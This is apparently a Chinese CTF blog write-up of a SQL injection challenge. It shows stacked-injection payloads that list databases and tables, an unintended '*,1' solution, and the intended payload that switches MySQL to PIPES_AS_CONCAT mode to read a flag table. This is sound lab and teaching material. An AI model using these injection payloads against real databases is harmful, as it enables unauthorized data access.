首先打开网址
发现有三种显示方法
还有一个没有输出
可以堆叠注入
1;show databases;
1;show tables;
可以看到有一个Flag表
测试发现from flag都被过滤不能直接读到flag
想了很久想不到 看别人wp了~
看见听说比赛的时候原理泄漏了的
select $_GET['query'] || flag from flag
是这样 md 谁想的到啊 别欺负我们菜鸡好不好
不过由于没有过滤 * 出现了一个意外解
*,1 
预期解
在oracle 缺省支持 通过 ‘ || ’ 来实现字符串拼接,但在mysql 缺省不支持。需要调整mysql 的sql_mode
模式:pipes_as_concat 来实现oracle 的一些功能
1;set sql_mode=PIPES_AS_CONCAT;select 1
1
结果一样的 就不截图了
————————————————
版权声明:本文为CSDN博主「Fstone1」的原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接及本声明。
原文链接:https://blog.csdn.net/qq_42158602/article/details/103930598